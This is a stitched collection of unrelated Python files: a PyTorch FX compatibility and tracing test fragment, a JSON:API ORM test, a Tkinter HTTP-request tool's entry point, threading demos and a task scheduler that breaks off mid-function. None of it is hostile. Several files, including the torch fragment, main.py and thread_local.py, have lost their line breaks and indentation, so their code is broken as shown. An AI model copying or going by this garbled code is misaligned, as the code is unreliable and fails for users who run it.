trivial_mappings = { str : 'str', int : 'int', float: 'float', bool: 'bool', torch.dtype: 'torch.dtype', torch.Tensor: 'torch.Tensor', torch.device: 'torch.device', torch.memory_format: 'torch.memory_format', slice: 'slice', torch.nn.Module: 'torch.nn.modules.module.Module', torch.fx.Graph : 'torch.fx.graph.Graph', torch.fx.Node : 'torch.fx.node.Node', torch.fx.Proxy : 'torch.fx.proxy.Proxy', torch.fx.node.Target : 'torch.fx.node.Target', torch.fx.node.Argument : 'torch.fx.node.Argument', torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode', torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule', torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match', Ellipsis : '...', typing.Any: 'Any', type(None): 'NoneType', None: 'None', typing.Iterator: 'Iterator', } mapping = trivial_mappings.get(t, None) if mapping: return mapping # Handle types with contained types contained = getattr(t, '__args__', None) or [] # Callables contain a bare List for arguments contained = t if isinstance(t, list) else contained # Python 3.8 puts type vars into __args__ for unbound types such as Dict if all(isinstance(ct, typing.TypeVar) for ct in contained): contained = [] contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained] contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else '' origin = getattr(t, '__origin__', None) if origin is None: # Unbound types don't have `__origin__` in some Python versions, so fix that up here. 
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin if origin in {tuple, typing.Tuple}: return f'Tuple{contained_type_str}' if origin in {typing.Union}: # Annoying hack to detect Optional if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)): not_none_param = contained[0] if contained[0] is not type(None) else contained[1] return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]' return f'Union{contained_type_str}' if origin in {dict, typing.Dict}: return f'Dict{contained_type_str}' if origin in {list, typing.List}: return f'List{contained_type_str}' if origin in {type, typing.Type}: return f'Type{contained_type_str}' if isinstance(t, typing.Callable): if len(contained) > 0 and contained[0] is not Ellipsis: return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]' else: return f'Callable{contained_type_str}' raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.' f'Please add support for this type and confirm with the ' f'FX team that your signature change is valid.') def test_function_back_compat(self): """ Test backward compatibility for function signatures with @compatibility(is_backward_compatible=True). Currently this checks for exact signature matches, which may lead to false positives. If this becomes too annoying, we can refine this check to actually parse out the saved schema strings and check if the change is truly backward- incompatible. """ signature_strs = [] for obj in _BACK_COMPAT_OBJECTS: if not isinstance(obj, type): signature_strs.append(self._fn_to_stable_annotation_str(obj)) signature_strs.sort() try: self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures') except AssertionError as e: msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \ f"as backwards-compatible has experienced a signature change. See the " \ f"above exception context for more information. If this change was " \ f"unintended, please revert it. If it was intended, check with the FX " \ f"team to ensure that the proper deprecation protocols have been followed " \ f"and subsequently --accept the change." raise AssertionError(msg) def test_class_member_back_compat(self): """ Test backward compatibility for members of classes with @compatibility(is_backward_compatible=True). Currently this checks for exact matches on the publicly visible members of the class. """ class_method_strs = [] for obj in _BACK_COMPAT_OBJECTS: if isinstance(obj, type): public_members = [name for name in obj.__dict__ if not name.startswith('_')] class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}') class_method_strs.sort() try: self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members') except AssertionError as e: msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \ f"as backwards-compatible has experienced change in its public members. See the " \ f"above exception context for more information. If this change was " \ f"unintended, please revert it. If it was intended, check with the FX " \ f"team to ensure that the proper deprecation protocols have been followed " \ f"and subsequently --accept the change." 
raise AssertionError(msg) def test_public_api_surface(self): non_back_compat_objects = {} def check_symbols_have_bc_designation(m, prefix): if not m.__name__.startswith('torch.fx'): return if m.__name__.startswith('torch.fx.experimental'): return for k, v in m.__dict__.items(): if v is m: continue if k.startswith('_'): continue if isinstance(v, types.ModuleType): check_symbols_have_bc_designation(v, prefix + [k]) elif isinstance(v, type) or isinstance(v, types.FunctionType): if v not in _MARKED_WITH_COMATIBLITY: non_back_compat_objects.setdefault(v) check_symbols_have_bc_designation(torch.fx, ['torch', 'fx']) check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes']) non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()] # Only want objects in torch.fx non_back_compat_strs = [ s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')] # Only want objects in public namespaces non_back_compat_strs = [ s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))] non_back_compat_strs.sort() if len(non_back_compat_strs) != 0: raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a " f"backwards-compatibility classification! Please decorate these " f"API(s) with `@torch.fx._compatibility.compatibility` to specify " f"BC guarantees.") class TestFunctionalTracing(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary", "has_torch_function_variadic", "handle_torch_function", "boolean_dispatch") TO_PATCH = {"has_torch_function": None, "has_torch_function_unary": None, "has_torch_function_variadic": None} BUILT_IN_FUNC = (AssertionError, "") PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable") PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated") LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default") ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$") CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow") INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined") MUTABLE = (RuntimeError, r"Tried to trace mutable operation") UNTRACEABLE_FUNCTIONALS = { "adaptive_avg_pool1d": BUILT_IN_FUNC, "avg_pool1d": BUILT_IN_FUNC, "avg_pool2d": BUILT_IN_FUNC, "avg_pool3d": BUILT_IN_FUNC, "celu_": BUILT_IN_FUNC, "channel_shuffle": BUILT_IN_FUNC, "conv1d": BUILT_IN_FUNC, "conv2d": BUILT_IN_FUNC, "conv3d": BUILT_IN_FUNC, "conv_tbc": BUILT_IN_FUNC, "conv_transpose1d": BUILT_IN_FUNC, "conv_transpose2d": BUILT_IN_FUNC, "conv_transpose3d": BUILT_IN_FUNC, "cosine_similarity": BUILT_IN_FUNC, "elu_": BUILT_IN_FUNC, "hardtanh_": BUILT_IN_FUNC, "leaky_relu_": BUILT_IN_FUNC, "logsigmoid": BUILT_IN_FUNC, "one_hot": BUILT_IN_FUNC, "pdist": BUILT_IN_FUNC, "pixel_shuffle": BUILT_IN_FUNC, "pixel_unshuffle": BUILT_IN_FUNC, "relu_": BUILT_IN_FUNC, "rrelu_": BUILT_IN_FUNC, "selu_": BUILT_IN_FUNC, "softplus": BUILT_IN_FUNC, "softshrink": BUILT_IN_FUNC, "threshold_": BUILT_IN_FUNC, "adaptive_avg_pool2d": LEN_ERROR, "adaptive_avg_pool3d": LEN_ERROR, 
"adaptive_max_pool2d_with_indices": LEN_ERROR, "adaptive_max_pool3d_with_indices": LEN_ERROR, "instance_norm": CONTROL_FLOW, "pad": LEN_ERROR, "adaptive_max_pool1d": PROXY_ITERABLE, "adaptive_max_pool2d": PROXY_ITERABLE, "adaptive_max_pool3d": PROXY_ITERABLE, "fractional_max_pool2d": PROXY_ITERABLE, "fractional_max_pool3d": PROXY_ITERABLE, "max_pool1d": PROXY_ITERABLE, "max_pool2d": PROXY_ITERABLE, "max_pool3d": PROXY_ITERABLE, "group_norm": PROXY_ITERATED, "lp_pool2d": PROXY_ITERATED, "max_unpool1d": PROXY_ITERATED, "max_unpool2d": PROXY_ITERATED, "max_unpool3d": PROXY_ITERATED, "adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH, "fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH, "fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH, "gelu": ARG_TYPE_MISMATCH, "hardshrink": ARG_TYPE_MISMATCH, "layer_norm": ARG_TYPE_MISMATCH, "lp_pool1d": ARG_TYPE_MISMATCH, "pairwise_distance": ARG_TYPE_MISMATCH, "affine_grid": CONTROL_FLOW, "alpha_dropout": CONTROL_FLOW, "batch_norm": CONTROL_FLOW, "binary_cross_entropy": CONTROL_FLOW, "binary_cross_entropy_with_logits": CONTROL_FLOW, "celu": CONTROL_FLOW, "cosine_embedding_loss": CONTROL_FLOW, "cross_entropy": CONTROL_FLOW, "ctc_loss": CONTROL_FLOW, "dropout": CONTROL_FLOW, "dropout2d": CONTROL_FLOW, "dropout3d": CONTROL_FLOW, "elu": CONTROL_FLOW, "embedding": CONTROL_FLOW, "embedding_bag": CONTROL_FLOW, "feature_alpha_dropout": CONTROL_FLOW, "fold": CONTROL_FLOW, "gaussian_nll_loss": CONTROL_FLOW, "glu": CONTROL_FLOW, "grid_sample": CONTROL_FLOW, "gumbel_softmax": CONTROL_FLOW, "hardsigmoid": CONTROL_FLOW, "hardswish": CONTROL_FLOW, "hardtanh": CONTROL_FLOW, "hinge_embedding_loss": CONTROL_FLOW, "huber_loss": CONTROL_FLOW, "interpolate": CONTROL_FLOW, "kl_div": CONTROL_FLOW, "l1_loss": CONTROL_FLOW, "leaky_relu": CONTROL_FLOW, "local_response_norm": CONTROL_FLOW, "margin_ranking_loss": CONTROL_FLOW, "max_pool1d_with_indices": CONTROL_FLOW, "max_pool2d_with_indices": CONTROL_FLOW, "max_pool3d_with_indices": CONTROL_FLOW, "mse_loss": CONTROL_FLOW, "multi_head_attention_forward": CONTROL_FLOW, "multi_margin_loss": CONTROL_FLOW, "multilabel_margin_loss": CONTROL_FLOW, "multilabel_soft_margin_loss": CONTROL_FLOW, "nll_loss": CONTROL_FLOW, "poisson_nll_loss": CONTROL_FLOW, "relu": CONTROL_FLOW, "relu6": CONTROL_FLOW, "rrelu": CONTROL_FLOW, "selu": CONTROL_FLOW, "silu": CONTROL_FLOW, "mish": CONTROL_FLOW, "smooth_l1_loss": CONTROL_FLOW, "soft_margin_loss": CONTROL_FLOW, "threshold": CONTROL_FLOW, "triplet_margin_loss": CONTROL_FLOW, "triplet_margin_with_distance_loss": CONTROL_FLOW, "unfold": CONTROL_FLOW, "upsample": CONTROL_FLOW, "upsample_bilinear": INTERPOLATE_ARGS_CONFLICT, "upsample_nearest": INTERPOLATE_ARGS_CONFLICT, "normalize" : MUTABLE, } # List of nn.functionals with Tensor inputs but not with type annotation FUNCTIONALS_WITHOUT_ANNOTATION = ( "adaptive_max_pool1d", "adaptive_max_pool2d", "adaptive_max_pool3d", "fractional_max_pool2d", "fractional_max_pool3d", "max_pool1d", "max_pool2d", "max_pool3d", "gaussian_nll_loss", "upsample", "upsample_bilinear", "upsample_nearest", ) # Inconsistent behavior between Python 3.8 and other Python versions: # - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED` # - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same # internal exception above # Use the following map to override the expected exception for Python 3.8 UNTRACEABLE_FUNCTIONALS_PY38 = { "adaptive_max_pool1d": PROXY_ITERATED, "adaptive_max_pool2d": PROXY_ITERATED, "adaptive_max_pool3d": PROXY_ITERATED, 
"fractional_max_pool2d": PROXY_ITERATED, "fractional_max_pool3d": PROXY_ITERATED, "max_pool1d": PROXY_ITERATED, "max_pool2d": PROXY_ITERATED, "max_pool3d": PROXY_ITERATED, "group_norm": LEN_ERROR } @classmethod def _get_functional(cls): functional_list = [] for f in dir(torch.nn.functional): if not f.islower(): continue # Ignore internal functions if f.startswith('_'): continue # Ignore supporting functions if f in cls.IGNORE_FUNCS: continue fn = getattr(torch.nn.functional, f) # Ignore non-callable object like modules if not isinstance(fn, Callable): continue if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION: try: sig = inspect.signature(fn) has_tensor_arg = False for arg, param in sig.parameters.items(): if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor): has_tensor_arg = True if not has_tensor_arg: continue # No signature or Object is not supported except ValueError: pass functional_list.append((f, fn)) return functional_list @classmethod def generate_test_func(cls, func_name, fn): def functional_test(self): if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \ sys.version_info >= (3, 8) and sys.version_info < (3, 10): exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name] with self.assertRaisesRegex(exc, err): symbolic_trace(fn) elif func_name in self.UNTRACEABLE_FUNCTIONALS: exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name] with self.assertRaisesRegex(exc, err): symbolic_trace(fn) else: symbolic_trace(fn) return functional_test @classmethod def generate_tests(cls): functional_list = cls._get_functional() for func_name, fn in functional_list: test_name = "test_nn_functional_" + func_name functional_test = cls.generate_test_func(func_name, fn) setattr(cls, test_name, functional_test) @classmethod def setUpClass(cls): def no(*args, **kwargs): return False for name in cls.TO_PATCH.keys(): cls.TO_PATCH[name] = getattr(torch.nn.functional, name) setattr(torch.nn.functional, name, no) @classmethod def tearDownClass(cls): for name in cls.TO_PATCH.keys(): setattr(torch.nn.functional, name, cls.TO_PATCH[name]) TestFunctionalTracing.generate_tests() instantiate_device_type_tests(TestOperatorSignatures, globals()) @skipIfNoTorchVision class TestVisionTracing(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated") INCONSISTENT_TYPE = ( RuntimeError, r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor" ) UNTRACEABLE_MODELS = { "fasterrcnn_resnet50_fpn": PROXY_ITERATED, "fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED, "fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED, "maskrcnn_resnet50_fpn": PROXY_ITERATED, "keypointrcnn_resnet50_fpn": PROXY_ITERATED, "retinanet_resnet50_fpn": PROXY_ITERATED, } UNSCRIPTABLE_MODELS = { "googlenet": INCONSISTENT_TYPE, "inception_v3": INCONSISTENT_TYPE, } output_transform = { "fcn_resnet50": lambda x: x["out"], "fcn_resnet101": lambda x: x["out"], "deeplabv3_resnet50": lambda x: x["out"], "deeplabv3_resnet101": lambda x: x["out"], "deeplabv3_mobilenet_v3_large": lambda x: x["out"], "lraspp_mobilenet_v3_large": lambda x: x["out"], "fasterrcnn_resnet50_fpn": lambda x: x[1], 
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1], "fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1], "maskrcnn_resnet50_fpn": lambda x: x[1], "keypointrcnn_resnet50_fpn": lambda x: x[1], "retinanet_resnet50_fpn": lambda x: x[1], } @classmethod def generate_test_fn(cls, name, model_fn, x, kwargs): def run_test(self): model = model_fn(**kwargs) model = model.eval() if name in self.UNTRACEABLE_MODELS: err, exc = self.UNTRACEABLE_MODELS[name] with self.assertRaisesRegex(err, exc): graph = symbolic_trace(model) else: out_transform = self.output_transform.get(name, lambda x: x) graph : torch.fx.GraphModule = symbolic_trace(model) a = out_transform(model(x)) b = out_transform(graph(x)) self.assertEqual(a, b) if name in self.UNSCRIPTABLE_MODELS: err, exc = self.UNSCRIPTABLE_MODELS[name] with self.assertRaisesRegex(err, exc): script = torch.jit.script(graph) else: script = torch.jit.script(graph) c = out_transform(script(x)) self.assertEqual(a, c) return run_test @classmethod def generate_classification_tests(cls): for k, v in torchvision_models.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_' + k x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224) kwargs = dict(num_classes=50) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_segmentation_tests(cls): for k, v in torchvision_models.segmentation.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_segmentation_' + k x = torch.rand(1, 3, 32, 32) kwargs = dict(num_classes=10, pretrained_backbone=False) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_detection_tests(cls): for k, v in torchvision_models.detection.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_detection_' + k x = [torch.rand(3, 300, 300)] kwargs = dict(num_classes=10, pretrained_backbone=False) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_video_tests(cls): for k, v in torchvision_models.video.__dict__.items(): if callable(v) and k[0].lower() == k[0] and k[0] != "_": test_name = 'test_torchvision_models_video_' + k x = torch.rand(1, 3, 4, 112, 112) kwargs = dict(num_classes=50) model_test = cls.generate_test_fn(k, v, x, kwargs) setattr(cls, test_name, model_test) @classmethod def generate_tests(cls): cls.generate_classification_tests() cls.generate_detection_tests() cls.generate_segmentation_tests() cls.generate_video_tests() if HAS_TORCHVISION: TestVisionTracing.generate_tests() if __name__ == '__main__': run_tests()
test_api.py
import jsonapi_requests, logging, requests, unittest, time
from jsonapi_requests.orm import OrmApi, AttributeField, RelationField, ApiModel
from threading import Thread

import sys
sys.path.append('..')


class Api(OrmApi):

    def disco(self, obj_name, obj_type=None, attributes=None, relations=None):
        '''
        Discover API resource objects and create a class from the result

        If there's a "sample" object available in the api, the discovered
        attributes will be added to the resulting class

        class Person(jsonapi_requests.orm.ApiModel):
            class Meta:
                type = 'person'
                api = api

            name = jsonapi_requests.orm.AttributeField('name')
            married_to = jsonapi_requests.orm.RelationField('married-to')
        '''
        if obj_type is None:
            obj_type = obj_name

        # Use fresh lists instead of mutable default arguments, so discovered
        # attributes do not leak between disco() calls
        attributes = list(attributes) if attributes else []
        relations = list(relations) if relations else []

        # Create the Meta class
        meta_class = type('Meta', (object,), {'type': obj_type, 'api': self})

        # Connect to the resource collection
        endpoint = self.endpoint(obj_type)
        try:
            response = endpoint.get()
        except jsonapi_requests.request_factory.ApiConnectionError:
            raise

        if response.data.as_data():
            # Use the first item as test sample
            test_id = response.data.as_data()[0]['id']
            endpoint = self.endpoint('{}/{}'.format(obj_type, test_id))
            response = endpoint.get()
            data = response.data.as_data()
            attributes += data.get('attributes', {}).keys()
            relations += data.get('relationships', {}).keys()

        properties = {'Meta': meta_class}

        attr_properties = {attr: AttributeField(attr) for attr in attributes}
        properties.update(attr_properties)

        rel_properties = {rel: RelationField(rel) for rel in relations}
        properties.update(rel_properties)

        api_object = type(obj_name, (ApiModel,), properties)
        setattr(self, obj_name, api_object)
        return api_object


import ctypes
import threading
import time


# inspired by https://github.com/mosquito/crew/blob/master/crew/worker/thread.py
def kill_thread(
    thread: threading.Thread,
    exception: BaseException = KeyboardInterrupt
) -> None:
    if not thread.is_alive():
        return

    res = ctypes.pythonapi.PyThreadState_SetAsyncExc(
        ctypes.c_long(thread.ident),
        ctypes.py_object(exception)
    )

    if res == 0:
        raise ValueError('nonexistent thread id')
    elif res > 1:
        ctypes.pythonapi.PyThreadState_SetAsyncExc(thread.ident, None)
        raise SystemError('PyThreadState_SetAsyncExc failed')

    while thread.is_alive():
        time.sleep(0.01)


def call_method(resource, method, data={}):
    ''' Call a C&C method on the given resource endpoint and return its result '''
    endpoint = resource + '/' + method
    try:
        r = requests.post(endpoint, json=data)
    except Exception:
        log.error('Error while calling C&C method {} on resource {}'.format(method, endpoint))
        return

    if not r.status_code == requests.codes.ok:
        log.error('Error ({}) while calling C&C method {} on resource {}'.format(r.status_code, method, resource))
        return

    data = r.json()
    result = data.get('meta', {}).get('result')
    log.debug('C&C Result: {}'.format(result))
    return result


API_ROOT = 'http://0.0.0.0:5000/'


def app_thread():
    from examples.demo_relationship import app


class Test_Api(unittest.TestCase):

    @classmethod
    def setUpClass(cls):
        cls.app_thread = Thread(target=app_thread)
        cls.app_thread.start()
        time.sleep(2)

        cls.api = Api.config({
            'API_ROOT': API_ROOT,
            'AUTH': ('basic_auth_login', 'basic_auth_password'),
            'VALIDATE_SSL': False,
            'TIMEOUT': 1,
        })

        cls.api.disco('User', 'Users')
        cls.api.disco('Book', 'Books')

    @classmethod
    def tearDownClass(cls):
        time.sleep(1)
        kill_thread(cls.app_thread)
        time.sleep(1)

    def test_0_create_user(self):
        user = self.api.User()
        user.name = 'TEST_NAME'
        user.save()
        self.assertEqual(type(user.id), str)

        for user in self.api.User.get_list():
            print(user.id, user.name)
            user.delete()

    def test_1_add_book(self):
        user = self.api.User()
        user.save()

        book = self.api.Book()
        book.name = 'BOOK_TEST_NAME'
        book.save()

        user.books.append(book)
        user.save()
        print('Book:', user.books[0].id)

        book.delete()
        user.delete()


log = logging.getLogger()
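# --- Usage sketch (outside the unittest flow, illustrative only) ---
# How the discovery helper above might be used against a running JSON:API
# service. It assumes a service reachable at API_ROOT that exposes the same
# 'Users' collection the tests rely on.
def demo_discovery(api_root=API_ROOT):
    api = Api.config({
        'API_ROOT': api_root,
        'VALIDATE_SSL': False,
        'TIMEOUT': 1,
    })
    User = api.disco('User', 'Users')   # builds an ApiModel subclass from a sample object
    for user in User.get_list():        # the same ORM calls used in Test_Api
        print(user.id, user.name)
    return User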
main.py
import os import sys from . import __version__ from .root import ( root, config, change_siz, tails, ) from .menu import bind_menu from .tab import ( nb, nb_names, bind_frame, delete_curr_tab, cancel_delete, create_new_reqtab, create_new_rsptab, create_helper, change_tab_name, send_request, save_config, switch_response_log, create_test_code, create_scrapy_code, get_html_pure_text, get_xpath_elements, get_auto_xpath, get_auto_json, choice_auto_json, execute_code, execute_scrapy_code, create_js_parse, create_selenium_parse, create_temp_idle, create_cmd_idle, create_encoder, create_test_code_urllib, pyset_pypi_gui, ) from .combinekey import ( bind_ctl_key, bind_alt_key, ) # 这里的框架就是目前需要设计处理的图形内容 from .frame import ( helper_window, request_window, ) # === 初始化 === settings = config['set'] if not settings: create_helper() else: for key,setting in settings.items(): if setting.get('type') == 'request': tab_id = bind_frame(request_window(setting),key) if key == config['focus']: nb.select(tab_id) # 保持最后执行成功时的 tab 焦点 # === 创建/删除/帮助 === # 绑定右键菜单 bind_menu(create_new_reqtab, '创建请求标签 [Ctrl+q]') bind_menu(delete_curr_tab, '删除当前标签 [Ctrl+w]') bind_menu(change_tab_name, '改当前标签名 [Ctrl+e]') bind_menu(save_config, '保存配置快照 [Ctrl+s]') bind_menu(create_js_parse, '创建 js解析页 [Ctrl+j]') bind_menu(create_helper, '帮助文档标签 [Ctrl+h]') bind_menu(create_selenium_parse, '浏览器执行窗 [Alt+w]*') bind_menu(create_encoder, '创建便捷加密编码窗口') bind_menu(pyset_pypi_gui, '设置全局 pypi 下载源') # 绑定 Ctrl + key 的组合键 bind_ctl_key(create_new_reqtab, 'q') bind_ctl_key(delete_curr_tab, 'w') # 撤销 ctrl + shift + w (必须是保存过的配置,并且撤销队列在程序关闭后就清空) bind_ctl_key(cancel_delete, 'w',shift=True) bind_ctl_key(change_tab_name, 'e') bind_ctl_key(save_config, 's') bind_ctl_key(send_request, 'r') bind_ctl_key(create_helper, 'h') bind_ctl_key(create_js_parse, 'j') bind_ctl_key(create_cmd_idle, '`') def _scrapy_or_selenium(): _select = nb.select() cname = nb_names.get(_select)['name'] ctype = (nb_names.get(_select).get('setting') or {}).get('type') # 如果当前窗口是 scrapy 代码窗口则代表直接项目执行 scrapy 代码,否则创建 selenium 窗口。 create_selenium_parse() if ctype != 'scrapy' else execute_scrapy_code() # 绑定 response 事件 bind_alt_key(create_new_rsptab, 'r') bind_alt_key(create_test_code, 'c') # 生成代码 bind_alt_key(get_html_pure_text, 'd') # 获取文本 bind_alt_key(get_xpath_elements, 'x') # 获取xpath bind_alt_key(get_auto_xpath, 'f') # 解析路径xpath bind_alt_key(get_auto_json, 'z') # 分析json列表 bind_alt_key(choice_auto_json, 'q') # 选则json列表 bind_alt_key(execute_code, 'v') # 代码执行 bind_alt_key(create_scrapy_code, 's') # 生成scrapy代码 bind_alt_key(_scrapy_or_selenium, 'w') # 用自动生成的环境执行scrapy代码 bind_alt_key(create_temp_idle, '`') # 使用临时的idle文本 bind_alt_key(create_test_code_urllib, 'u') # 生成 urllib(py3) 请求的代碼 def algo(): from .frame import encode_window fr = encode_window() ico = os.path.join(os.path.split(__file__)[0],'ico.ico') fr.iconbitmap(ico) fr.title('命令行输入 ee 则可快速打开便捷加密窗口(为防冲突,输入vv e也可以打开), 组合快捷键 Alt+` 快速打开IDLE') fr.bind('<Escape>',lambda *a:fr.master.quit()) fr.bind('<Alt-`>',lambda *a:create_temp_idle()) fr.bind('<Control-`>',lambda *a:create_cmd_idle()) fr.protocol("WM_DELETE_WINDOW",lambda *a:fr.master.quit()) fr.master.withdraw() fr.mainloop() escodegen = None def execute(): argv = sys.argv if 'e' in argv: algo() return def preimport(): global escodegen import time time.sleep(.5) # 需要花点时间导包的部分,用别的线程进行预加载,增加工具顺滑度 try: import js2py except: pass try: import execjs except: pass try: import js2py.py_node_modules.escodegen as escodegen except: pass import threading threading.Thread(target=preimport).start() 
root.title('vrequest [{}]'.format(__version__)) ico = os.path.join(os.path.split(__file__)[0],'ico.ico') root.iconbitmap(ico) root.geometry(config.get('siz') or '600x725+100+100') root.bind('<Configure>',lambda e:change_siz()) root.bind('<Escape>',lambda e:switch_response_log()) def quit_(): try: for tail in tails: try: tail() except: import traceback print(traceback.format_exc()) finally: root.destroy() root.protocol("WM_DELETE_WINDOW",lambda *a: quit_()) root.mainloop() if __name__ == '__main__': execute()
demon1.py
import threading
import time


def run():
    time.sleep(2)
    print('Current thread name:', threading.current_thread().name)
    time.sleep(2)


if __name__ == '__main__':
    start_time = time.time()
    print('This is the main thread:', threading.current_thread().name)
    thread_list = []
    for i in range(5):
        t = threading.Thread(target=run)
        thread_list.append(t)

    for t in thread_list:
        # Thread.setDaemon() is deprecated; set the daemon attribute instead
        t.daemon = True
        t.start()

    print('Main thread finished!', threading.current_thread().name)
    print('Total time:', time.time() - start_time)
thread_local.py
""" thread local demo """ import threading import time my_data = threading.local() def do_it2() -> None: """ do it 2 """ print("doIt2: thread id: " + str(threading.get_ident()) + ", my data: " + my_data.x) def do_it() -> None: """ do it """ time.sleep(1) my_data.x = "x: " + threading.current_thread().name print("".join([ "thread id: ", str(threading.get_ident()), ", thread name: ", threading.current_thread().name ])) do_it2() thread1 = threading.Thread(target=do_it, name="thread1") thread1.start() thread2 = threading.Thread(target=do_it, name="thread2") thread2.start()
master.py
import sys
import json
import socket
import time
import random
import numpy as np
import requests
import threading
import copy


def initConfig():
    with open(sys.argv[1]) as f:
        conf = json.load(f)

    # structure: [ [id, slot, port], [id, slot, port],... ]
    config = []
    for k, v in conf.items():
        for worker in v:
            l = []
            l += worker.values()
            config += [l]
    return config


def launchTask(w_id, job_id, job_type, task):
    config_lock.acquire()
    config[w_id][1] -= 1                       # Decrement the number of free slots
    config_lock.release()

    if(w_id == 0):                             # Choose socket/port based on Worker
        conn, addr = taskLaunchSocket1.accept()
    if(w_id == 1):
        conn, addr = taskLaunchSocket2.accept()
    if(w_id == 2):
        conn, addr = taskLaunchSocket3.accept()

    task['job_id'] = job_id                    # Add job_id and job_type (M or R) to message to be sent
    task['job_type'] = job_type
    task_logs[task['task_id']] = [time.time(), w_id+1]   # Add task start time to log

    message = json.dumps(task)                 # Send task to Worker
    conn.send(message.encode())
    conn.close()


# Note: this function shadows the stdlib 'random' module imported above;
# only numpy's RNG is used inside it.
def random(job_id, tasks, job_type):
    #print("I schedule at random.\n")
    for task in tasks:
        w_id = np.random.randint(0, 3)
        while(config[w_id][1] == 0):           # While randomly picked worker has no free slots
            w_id = np.random.randint(0, 3)     # Randomly pick another
        launchTask(w_id, job_id, job_type, task)   # Initiate send task to Worker


def roundRobin(job_id, tasks, job_type):
    #print("I like Round Robin.\n")
    for task in tasks:
        w_id = 0
        while(config[w_id][1] == 0):           # While current worker has no free slots
            w_id = (w_id+1) % 3                # pick the next
        launchTask(w_id, job_id, job_type, task)


def leastLoaded(job_id, tasks, job_type):
    #print("I prefer my loads light.\n")
    for task in tasks:
        config2 = copy.copy(config)
        config2.sort(key=lambda x: x[1], reverse=True)   # Sort a copy of config by free slots, descending
        while(config2[0][1] == 0):             # If even the most-free worker has no slot, wait 1s and try again
            time.sleep(1)
            config2 = copy.copy(config)
            config2.sort(key=lambda x: x[1], reverse=True)
        w_id = config2[0][0] - 1               # w_id = machine with most free slots
        launchTask(w_id, job_id, job_type, task)   # Initiate send task to worker


def pickScheduler(job_id, tasks, job_type):    # Calls scheduling algo based on CL arg
    if(sys.argv[2] == "random"):
        random(job_id, tasks, job_type)
    elif(sys.argv[2] == "rr"):
        roundRobin(job_id, tasks, job_type)
    else:
        leastLoaded(job_id, tasks, job_type)


def monitorReduce():
    scheduled = []                             # Keep track of reduce tasks that have already been schd.
    while(1):
        if(len(scheduling_pool) > 0):
            scheduling_pool_lock.acquire()
            for job_id, status in scheduling_pool.items():
                if(len(status[1]) == 0 and job_id not in scheduled):   # If all m_tasks are complete + not already schd.
                    scheduled.append(job_id)                           # Add task to list of schd. tasks
                    pickScheduler(job_id, status[0], 'R')              # Pick scheduling algo based on CL arg
            scheduling_pool_lock.release()
